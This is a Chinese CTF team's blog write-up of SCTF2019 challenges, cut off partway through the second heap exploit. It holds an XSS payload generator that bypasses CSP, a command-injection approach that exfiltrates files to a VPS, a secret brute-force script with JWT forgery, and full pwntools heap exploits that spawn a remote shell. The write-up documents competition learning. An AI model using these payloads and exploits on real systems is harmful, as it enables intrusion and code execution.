<!DOCTYPE HTML>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>SCTF2019-WriteUp | kn0ck&#39;s blog | 一群CTF爱好者</title>

  
  <meta name="author" content="kn0ck Team">
  

  
  <meta name="description" content="kn0ck战队成立于2017年9月，是由一群来自全国各地的网络爱好者组成，战队成员因兴趣与热爱而聚集，以不服输的精神全力向着梦想进发。作为一支新兴CTF队伍，战队的宗旨是通过实际比赛将理论知识更好的发挥，以赛代练，锻炼和提升个人的技术水平，在比赛中广交朋友，共同进步。">
  

  
  <meta name="keywords" content="CTF,kn0ck,网络安全,web,pwn,夺旗赛">
  

  <meta id="viewport" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, minimum-scale=1, user-scalable=no, minimal-ui">
  <meta name="apple-mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black">

  <meta property="og:title" content="SCTF2019-WriteUp">

  <meta property="og:site_name" content="kn0ck&#39;s blog">

  
  <meta property="og:image" content="/favicon.ico">
  

  <link href="/favicon.ico" rel="icon">
  <link rel="alternate" href="/atom.xml" title="kn0ck&#39;s blog" type="application/atom+xml">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
</head>


<body>
<div class="blog">
  <div class="content">

    <header>
  <div class="site-branding">
    <h1 class="site-title">
      <a href="/">kn0ck&#39;s blog</a>
    </h1>
    <p class="site-description">一群CTF爱好者</p>
  </div>
  <nav class="site-navigation">
    <ul>
      
        <li><a href="/">主页</a></li>
      
        <li><a href="/archives">归档</a></li>
      
        <li><a href="/about">关于</a></li>
      
        <li><a href="/author">队员</a></li>
      
    </ul>
  </nav>
</header>

    <main class="site-main posts-loop">
    <article>

  
    
    <h3 class="article-title"><span>SCTF2019-WriteUp</span></h3>
    
  

  <div class="article-top-meta">
    <span class="posted-on">
      <a href="/2019/06/25/SCTF2019-WP/" rel="bookmark">
        <time class="entry-date published" datetime="2019-06-25T07:08:49.000Z">
          2019-06-25
        </time>
      </a>
    </span>
    
    <span class="posted-on">
      <a href="/2019/06/25/SCTF2019-WP/" rel="bookmark">
        
          kn0ck
        

      </a>
    </span>
    
  </div>


  

  <div class="article-content">
    <div class="entry">
      
        <blockquote>
<p>感谢Syclover师傅们的题目。<br>比赛体验良好，最终国内第五名。<br>以下为我们的WP。</p>
</blockquote>
<a id="more"></a>


<h2 id="WEB"><a href="#WEB" class="headerlink" title="WEB"></a>WEB</h2><h3 id="math-is-fun1-amp-math-is-fun2"><a href="#math-is-fun1-amp-math-is-fun2" class="headerlink" title="math-is-fun1 &amp; math-is-fun2"></a>math-is-fun1 &amp; math-is-fun2</h3><p>XSS绕过CSP和DOMpurify，看样子hint给的通过数学公式这块下手。</p>
<p>首先看一下CSP：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">Content-Security-Policy: </span><br><span class="line">	  font-src cdnjs.cloudflare.com &apos;self&apos;;    </span><br><span class="line">    script-src &apos;self&apos; &apos;nonce-3fna6ZTUPOk=&apos; &apos;strict-dynamic&apos; &apos;unsafe-eval&apos;;    </span><br><span class="line">    style-src &apos;self&apos; &apos;unsafe-inline&apos;;    </span><br><span class="line">    child-src &apos;none&apos;;    </span><br><span class="line">    object-src &apos;none&apos;; </span><br><span class="line">    base-uri &apos;self&apos; &apos;nonce-3fna6ZTUPOk=&apos;;    </span><br><span class="line">    connect-src &apos;self&apos;;    </span><br><span class="line">    sandbox allow-scripts allow-modals allow-same-origin;    </span><br><span class="line">    default-src &apos;self&apos;;</span><br></pre></td></tr></table></figure>

<p>可以发现js有nonce做验证，但是又采取了<code>strict-dynamic</code>,所以，便可以通过动态加载js来绕过nonce。</p>
<p>然后进一步对网站测试，发现以下漏洞隐患点：</p>
<blockquote>
<p>整理一下已知点：</p>
<ol>
<li>get传text，可以通过js覆盖textarea</li>
<li>get传name，会作为window.config的值 。 通过换行，进而<strong>可以修改任意**</strong>全局变量**</li>
<li>有一个jsonp接口。</li>
<li>应该需要从math这里找突破点。</li>
<li>应该还需要绕过DOMPurify。（貌似所有输入全调这个接口了）</li>
</ol>
</blockquote>
<p>然后进行猜测，应该是要<strong>通过2来修改MathJax的配置，从而加载任意js文件，此时引入jsonp来实现xss。</strong></p>
<p>尝试修改jax的根路径，但是该处修改在引入MathJax之前，导致Hub改不了。改Ajax的话，会额外添加一个AuthorConfig字段，貌似不生效、</p>
<p>如下payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">name=123%0aMathJax[&apos;Ajax&apos;]=&#123;&quot;config&quot;:&#123;&quot;root&quot;:&quot;http://47.110.128.101/5am3test&quot;&#125;&#125;</span><br></pre></td></tr></table></figure>

<p>可以看到</p>
<p><img src="https://img.5am3.com/20190624156134810069567.jpg" alt="20190624156134810069567.jpg"></p>
<p>此时在这个AuthorConfig卡了许久，查阅资料也没找到啥。最终无奈之下，找源头，翻了一下MathJax的源码，对AuthorConfig进行搜索，找到以下点，然后顿时思路清晰，构造payload即可。</p>
<p><img src="https://img.5am3.com/20190624156134827062364.png" alt="20190624156134827062364.png"></p>
<p>最后利用时，发现jsonp接口还有个waf，对引号进行了过滤，此时用eval+fromCharCode绕过即可，最终poc如下。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">getPayload</span><span class="params">(evaljs)</span>:</span></span><br><span class="line">	p = <span class="string">"http://47.110.128.101/config?callback="</span></span><br><span class="line">	payload=<span class="string">'eval(String.fromCharCode('</span></span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> range(len(evaljs)):</span><br><span class="line">		payload+=str(ord(evaljs[i]))</span><br><span class="line">		<span class="keyword">if</span>(i+<span class="number">1</span>&lt;len(evaljs)):</span><br><span class="line">			payload+=<span class="string">','</span></span><br><span class="line">	payload+=<span class="string">'));//'</span></span><br><span class="line">	payload+=<span class="string">""</span></span><br><span class="line">	test = <span class="string">"http://47.110.128.101/challenge?name=abcd%0aMathJax[%27root%27]%3d"</span></span><br><span class="line">	payload = test+p+payload+<span class="string">"%26/"</span></span><br><span class="line">	print(<span class="string">"[payload] "</span>+payload)</span><br><span class="line">	<span class="keyword">return</span> </span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"></span><br><span class="line">	arg = sys.argv[<span class="number">2</span>]</span><br><span class="line">	getPayload(arg)</span><br></pre></td></tr></table></figure>

<p>第二题依旧一样，通杀的payload。</p>
<h3 id="easyweb"><a href="#easyweb" class="headerlink" title="easyweb"></a>easyweb</h3><p>login登入由js进行校验，所以登入主要从js下手，配置一下burpsuite的抓包规则</p>
<p><img src="https://img.5am3.com/20190624156134842162539.png" alt="20190624156134842162539.png"></p>
<p>抓取访问<a href="USER_CANCEL">https://sctf2019.l0ca1.xyz/#/</a>main 交互的response返回包，修改response里面的requreiLogin的值为0，也就是修改为不需要登录直接进后台</p>
<p><img src="https://img.5am3.com/20190624156134843859268.png" alt="20190624156134843859268.png"></p>
<p>进入后台后是一个JSON打包的点，思路也就是通过构造JSON数据，在打包过程中触发命令执行</p>
<p><img src="https://img.5am3.com/20190624156134845186761.png" alt="20190624156134845186761.png"></p>
<p>随便填些数据进行测试，抓取数据包分析一下</p>
<p><img src="https://img.5am3.com/20190624156134846221741.png" alt="20190624156134846221741.png"></p>
<p>可以发现有给一个key：abcdefghiklmn123，应该是一个校验位，放那就好了，主要是构造npm的数据，思路是进行命令执行，所以可以构造出一个命令执行语句，命令执行没有回显，可以通过vps的log获取数据进行回显，构造命令注入的payload</p>
<p><img src="https://img.5am3.com/20190624156134848622476.png" alt="20190624156134848622476.png"></p>
<p>可以在vps上获取到asound.conf的数据信息</p>
<p><img src="https://img.5am3.com/20190624156134850099282.png" alt="20190624156134850099282.png"></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">#</span><br><span class="line"># Place your global alsa-lib configuration here...</span><br><span class="line">#</span><br><span class="line"></span><br><span class="line">@hooks [</span><br><span class="line">	&#123;</span><br><span class="line">		func load</span><br><span class="line">		files [</span><br><span class="line">			&quot;/etc/alsa/pulse-default.conf&quot;</span><br><span class="line">		]</span><br><span class="line">		errors false</span><br><span class="line">	&#125;</span><br><span class="line">]</span><br></pre></td></tr></table></figure>

<p>本以为命令注入就解出来了，万万没想到怎么都没找到flag，也就是说还有一层考点……</p>
<p>查阅资料找到：<a href="https://www.anquanke.com/post/id/170596" target="_blank" rel="noopener">https://www.anquanke.com/post/id/170596</a></p>
<p>serveless执行</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -X POST -H <span class="string">"Content-Type: application/json"</span> https://us-east1-slsbot-214001.cloudfunctions.net/gcp-py-explore --data <span class="string">'&#123;"ls":"./"&#125;'</span> | base64 --decode</span><br></pre></td></tr></table></figure>

<p>可以列出云上的一些文件,依然还没有找到flag。</p>
<p>于是本地装一下awscli 配下token看看吧</p>
<p><a href="https://www.anquanke.com/post/id/170342" target="_blank" rel="noopener">https://www.anquanke.com/post/id/170342</a></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">aws s3 cp s3://static.l0ca1.xyz/flaaaaaaaaag/flaaaag.txt ./flag.txt --region ap-northeast-1</span><br></pre></td></tr></table></figure>

<h3 id="Flag-Shop"><a href="#Flag-Shop" class="headerlink" title="Flag Shop"></a>Flag Shop</h3><p>通过 <a href="http://47.110.15.101/robots.txt" target="_blank" rel="noopener">http://47.110.15.101/robots.txt</a> 得到 <a href="http://47.110.15.101//filebak" target="_blank" rel="noopener">http://47.110.15.101//filebak</a>  进一步得到源码</p>
<p>分析源码，发现隐患点(没个卵用，还非要写上)</p>
<figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">unless</span> params[<span class="symbol">:SECRET</span>].<span class="literal">nil</span>?</span><br><span class="line">  puts <span class="string">"[ma1] "</span>+<span class="string">"<span class="subst">#&#123;params[<span class="symbol">:SECRET</span>].match(<span class="regexp">/[0-9a-z]+/</span>)&#125;</span>"</span></span><br><span class="line">  <span class="keyword">if</span> secret.match(<span class="string">"<span class="subst">#&#123;params[<span class="symbol">:SECRET</span>].match(<span class="regexp">/[0-9a-z]+/</span>)&#125;</span>"</span>)</span><br><span class="line">    puts <span class="string">"[flag] "</span>+flag</span><br><span class="line">  <span class="keyword">end</span></span><br><span class="line"><span class="keyword">end</span></span><br></pre></td></tr></table></figure>

<p>猜测是通过某种缺陷，来对secret进行盲注，进而读取secret，伪造 token，getflag？ </p>
<p> 核心的代码是上面这里， 但如何才能构造盲注？</p>
<p>一开始怀疑是正则的效率问题，但是此接口仅允许get方式，对url长度有限制。</p>
<p>最终查阅资料可以发现ruby有几个全局变量。其中$&amp;表示最近一次与正则表达式匹配的字符串。此时搭配之前一直很迷的SECRET，便可以爆破SECRET，脚本如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">"http://47.110.15.101/work?name=%3C%25%3d$%26%25%3E&amp;do=%3C%25%3d$%26%25%3E+is+working&amp;SECRET=&#123;SECRET&#125;"</span></span><br><span class="line"></span><br><span class="line">SECRET =<span class="string">"ec55ce17b51f7f2588b3d2f09c821e6499984b09810e652ce9fa4882fe4875c8"</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">headers = &#123;</span><br><span class="line">	<span class="string">"Cookie"</span>: <span class="string">"auth=eyJhbGciOiJIUzI1NiJ9.eyJ1aWQiOiJhMDc4ZDU3ZC0wZjZmLTRhNTItODE1MC0yMGYyOTkzYzkxMTUiLCJqa2wiOjI4fQ.gQnZDaa3pKpldiD07vWsX65SO4Ioz5ZawOy5xJPNSEU;"</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">zidian=<span class="string">"1234567890qwertyuiopasdfghjklzxcvbnm"</span></span><br><span class="line"><span class="keyword">for</span> jj <span class="keyword">in</span> range(<span class="number">30</span>):</span><br><span class="line">	<span class="keyword">for</span> i <span class="keyword">in</span> zidian:</span><br><span class="line">		test = SECRET + i</span><br><span class="line">		<span class="comment"># test = i + SECRET</span></span><br><span class="line">		crackUrl = url.replace(<span class="string">"&#123;SECRET&#125;"</span>,test)</span><br><span class="line">		text = requests.get(crackUrl,headers=headers).text</span><br><span class="line">		<span class="keyword">if</span>(<span class="string">"'"</span>+test+<span class="string">" "</span> <span class="keyword">in</span> text):</span><br><span class="line">			SECRET = test</span><br><span class="line">			print(<span class="string">"[SECRET] "</span> + SECRET)</span><br><span class="line">			<span class="keyword">break</span></span><br></pre></td></tr></table></figure>

<p>然后直接伪造jwt就可以了，有了key直接去那个神奇的网站就行了。最终在cookie中读出flag</p>
<h2 id="PWN"><a href="#PWN" class="headerlink" title="PWN"></a>PWN</h2><h3 id="one-heap"><a href="#one-heap" class="headerlink" title="one_heap"></a>one_heap</h3><p>漏洞点free后指针未清0</p>
<p>首先爆破heap地址，攻击tcache。然后在tcache上爆破stdout地址用来泄露libc。最后将free hook改成system</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PwnContext <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    context.terminal = [<span class="string">'tmux'</span>, <span class="string">'split'</span>, <span class="string">'-h'</span>]</span><br><span class="line">    <span class="comment">#-----function for quick script-----#</span></span><br><span class="line">    s       = <span class="keyword">lambda</span> data               :ctx.send(str(data))        <span class="comment">#in case that data is a int</span></span><br><span class="line">    sa      = <span class="keyword">lambda</span> delim,data         :ctx.sendafter(str(delim), str(data)) </span><br><span class="line">    st      = <span class="keyword">lambda</span> delim,data         :ctx.sendthen(str(delim), str(data)) </span><br><span class="line">    sl      = <span class="keyword">lambda</span> data               :ctx.sendline(str(data)) </span><br><span class="line">    sla     = <span class="keyword">lambda</span> delim,data         :ctx.sendlineafter(str(delim), str(data))</span><br><span class="line">    r       = <span class="keyword">lambda</span> numb=<span class="number">4096</span>          :ctx.recv(numb)</span><br><span class="line">    ru      = <span class="keyword">lambda</span> delims, drop=<span class="keyword">True</span>  :ctx.recvuntil(delims, drop)</span><br><span class="line">    irt     = <span class="keyword">lambda</span>                    :ctx.interactive()</span><br><span class="line">    </span><br><span class="line">    rs      = <span class="keyword">lambda</span> *args, **kwargs    :ctx.start(*args, **kwargs)</span><br><span class="line">    leak    = <span class="keyword">lambda</span> address, count=<span class="number">0</span>   :ctx.leak(address, count)</span><br><span class="line">    </span><br><span class="line">    uu32    = <span class="keyword">lambda</span> data   :u32(data.ljust(<span class="number">4</span>, <span class="string">'\0'</span>))</span><br><span class="line">    uu64    = <span class="keyword">lambda</span> data   :u64(data.ljust(<span class="number">8</span>, <span class="string">'\0'</span>))</span><br><span class="line"></span><br><span class="line">    debugg = <span class="number">0</span></span><br><span class="line">    logg = <span class="number">0</span></span><br><span class="line"></span><br><span class="line">    ctx.binary = <span class="string">'./one_heap'</span></span><br><span class="line"></span><br><span class="line">    ctx.symbols = &#123;<span class="string">'ptr'</span>:<span class="number">0x202050</span>&#125;</span><br><span class="line">    <span class="comment">#ctx.custom_lib_dir = '/glibc/x64/2.26/lib/'</span></span><br><span class="line">    <span class="comment">#ctx.debug_remote_libc = True</span></span><br><span class="line">    <span class="comment">#ctx.debug()</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">        <span class="keyword">try</span>:</span><br><span class="line">            <span class="keyword">if</span> debugg:</span><br><span class="line">                rs()</span><br><span class="line">            <span class="keyword">else</span>:</span><br><span class="line">                ctx.remote = (<span class="string">'47.104.89.129'</span>, <span class="number">10001</span>)</span><br><span class="line">                rs(method = <span class="string">'remote'</span>)</span><br><span class="line"></span><br><span class="line">            <span class="keyword">if</span> logg:</span><br><span class="line">                context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">            <span class="function"><span class="keyword">def</span> <span class="title">choice</span><span class="params">(num)</span>:</span></span><br><span class="line">                sla(<span class="string">'choice:'</span>,num)</span><br><span class="line"></span><br><span class="line">            <span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(asize,acon)</span>:</span></span><br><span class="line">                choice(<span class="number">1</span>)</span><br><span class="line">                sla(<span class="string">'size:'</span>,asize)</span><br><span class="line">                <span class="keyword">if</span> len(acon) &lt; asize:</span><br><span class="line">                    sla(<span class="string">'content:'</span>,acon)</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    sa(<span class="string">'content:'</span>,acon)</span><br><span class="line">            <span class="function"><span class="keyword">def</span> <span class="title">free</span><span class="params">()</span>:</span></span><br><span class="line">                choice(<span class="number">2</span>)</span><br><span class="line">            </span><br><span class="line">            add(<span class="number">0x70</span>,<span class="string">'AAA'</span>)</span><br><span class="line">            free()</span><br><span class="line">            free()</span><br><span class="line">            <span class="keyword">if</span> debugg:</span><br><span class="line">                <span class="keyword">if</span> p64(ctx.bases.heap)[<span class="number">1</span>] != <span class="string">'\x70'</span>:</span><br><span class="line">                    <span class="keyword">print</span> hex(ctx.bases.heap)</span><br><span class="line">                    ctx.close()</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line">            </span><br><span class="line">            add(<span class="number">0x70</span>,p16(<span class="number">0x7010</span>))</span><br><span class="line">            add(<span class="number">0x70</span>,<span class="string">''</span>)</span><br><span class="line">            add(<span class="number">0x70</span>,p64(<span class="number">0</span>)*<span class="number">4</span>+<span class="string">'\x00'</span>*<span class="number">3</span>+<span class="string">'\x07'</span>)</span><br><span class="line">            free()</span><br><span class="line">            <span class="comment">#0x7ffff7dd0780</span></span><br><span class="line">            <span class="comment">#add(0x40,'\x00'*2+'\x07'+'\x00'*3+'\x07'+'\x00')</span></span><br><span class="line">            add(<span class="number">0x40</span>,<span class="string">'\x00'</span>)</span><br><span class="line">            fake = <span class="number">0xb770</span></span><br><span class="line">            </span><br><span class="line">            <span class="keyword">if</span> debugg:</span><br><span class="line">                <span class="keyword">if</span> p64(ctx.bases.libc+<span class="number">0x3ec760</span>+<span class="number">0x10</span>)[:<span class="number">2</span>]!=<span class="string">'\x70\xb7'</span>:</span><br><span class="line">                    ctx.close()</span><br><span class="line">                    <span class="keyword">continue</span></span><br><span class="line"></span><br><span class="line">            add(<span class="number">0x10</span>,p64(<span class="number">0</span>)+p32(fake)[:<span class="number">2</span>])</span><br><span class="line">            free()</span><br><span class="line">            add(<span class="number">0x50</span>,p32(fake+<span class="number">0x10</span>)[:<span class="number">2</span>])</span><br><span class="line">            <span class="comment">#ctx.debug()</span></span><br><span class="line">            the_bytes = <span class="string">'\x70'</span></span><br><span class="line">            add(<span class="number">0x40</span>,the_bytes)</span><br><span class="line">            sl(<span class="number">1</span>)</span><br><span class="line">            sleep(<span class="number">0.1</span>)</span><br><span class="line">            sl(<span class="number">0x70</span>)</span><br><span class="line">            sleep(<span class="number">0.1</span>)</span><br><span class="line">            sl(the_bytes)</span><br><span class="line">            <span class="comment">#ctx.debug()</span></span><br><span class="line">            libc_base = uu64(r(<span class="number">6</span>)) - <span class="number">0x3ec770</span></span><br><span class="line">            log.success(<span class="string">"libc_base = %s"</span>%hex(libc_base))</span><br><span class="line">            libc = ELF(<span class="string">'/lib/x86_64-linux-gnu/libc.so.6'</span>)</span><br><span class="line">            save_text_base = libc_base + <span class="number">0x61a170</span></span><br><span class="line">            malloc_hook = libc_base + libc.symbols[<span class="string">'__malloc_hook'</span>]</span><br><span class="line">            free_hook = libc_base + libc.symbols[<span class="string">'__free_hook'</span>]</span><br><span class="line">            system = libc_base + libc.symbols[<span class="string">'system'</span>]</span><br><span class="line">            stdout = libc_base + <span class="number">0x3ec760</span></span><br><span class="line">            </span><br><span class="line">            add(<span class="number">0x18</span>,p64(malloc_hook<span class="number">-8</span>)+p64(free_hook)+p64(stdout+<span class="number">0x10</span>))</span><br><span class="line">            add(<span class="number">0x50</span>,p64(save_text_base)+p64(libc_base+<span class="number">0x3ec7e3</span>)+p64(save_text_base)+p64(save_text_base+<span class="number">6</span>))</span><br><span class="line">            text_base = uu64(r(<span class="number">6</span>))</span><br><span class="line">            log.success(<span class="string">"text_base = %s"</span>%hex(text_base))</span><br><span class="line">            to_call_free = text_base + <span class="number">0xDAE</span></span><br><span class="line">            add(<span class="number">0x40</span>,p64(system+<span class="number">27</span>))</span><br><span class="line">            add(<span class="number">0x30</span>,<span class="string">'/bin/sh\x00'</span>+p64(to_call_free))</span><br><span class="line">            <span class="comment">#ctx.debug()</span></span><br><span class="line">            <span class="string">"""</span></span><br><span class="line"><span class="string">            add(0x18,p64(malloc_hook))</span></span><br><span class="line"><span class="string">            one = libc_base + 0x4f2c5</span></span><br><span class="line"><span class="string">            log.success("one = %s"%hex(one))</span></span><br><span class="line"><span class="string">            add(0x30,p64(one))</span></span><br><span class="line"><span class="string">            """</span></span><br><span class="line">            choice(<span class="number">1</span>)</span><br><span class="line">            sla(<span class="string">'size:'</span>,<span class="number">1</span>)</span><br><span class="line">            <span class="comment">#ctx.debug()</span></span><br><span class="line">            irt()</span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">        <span class="keyword">except</span> KeyboardInterrupt:</span><br><span class="line">            exit()</span><br><span class="line">        <span class="keyword">except</span>:</span><br><span class="line">            <span class="keyword">if</span> ctx.io:</span><br><span class="line">                ctx.close()</span><br><span class="line">            <span class="keyword">pass</span></span><br></pre></td></tr></table></figure>

<h3 id="two-heap"><a href="#two-heap" class="headerlink" title="two_heap"></a>two_heap</h3><p>漏洞点free后指针未清0</p>
<p>%a%a%a%a%a 双精度16字节可以泄露libc，然后利用0x20大小的chunk可以分配四个来攻击free hook即可。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> PwnContext <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    context.terminal = [<span class="string">'tmux'</span>, <span class="string">'split'</span>, <span class="string">'-h'</span>]</span><br><span class="line">    <span class="comment">#-----function for quick script-----#</span></span><br><span class="line">    s       = <span class="keyword">lambda</span> data               :ctx.send(str(data))        <span class="comment">#in case that data is a int</span></span><br><span class="line">    sa      = <span class="keyword">lambda</span> delim,data         :ctx.sendafter(str(delim), str(data)) </span><br><span class="line">    st      = <span class="keyword">lambda</span> delim,data         :ctx.sendthen(str(delim), str(data)) </span><br><span class="line">    sl      = <span class="keyword">lambda</span> data               :ctx.sendline(str(data)) </span><br><span class="line">    sla     = <span class="keyword">lambda</span> delim,data         :ctx.sendlineafter(str(delim), str(data))</span><br><span class="line">    r       = <span class="keyword">lambda</span> numb=<span class="number">4096</span>          :ctx.recv(numb)</span><br><span class="line">    ru      = <span class="keyword">lambda</span> delims, drop=<span class="keyword">True</span>  :ctx.recvuntil(delims, drop)</span><br><span class="line">    irt     = <span class="keyword">lambda</span>                    :ctx.interactive()</span><br><span class="line">    </span><br><span class="line">    rs      = <span class="keyword">lambda</span> *args, **kwargs    :ctx.start(*args, **kwargs)</span><br><span class="line">    leak    = <span class="keyword">lambda</span> 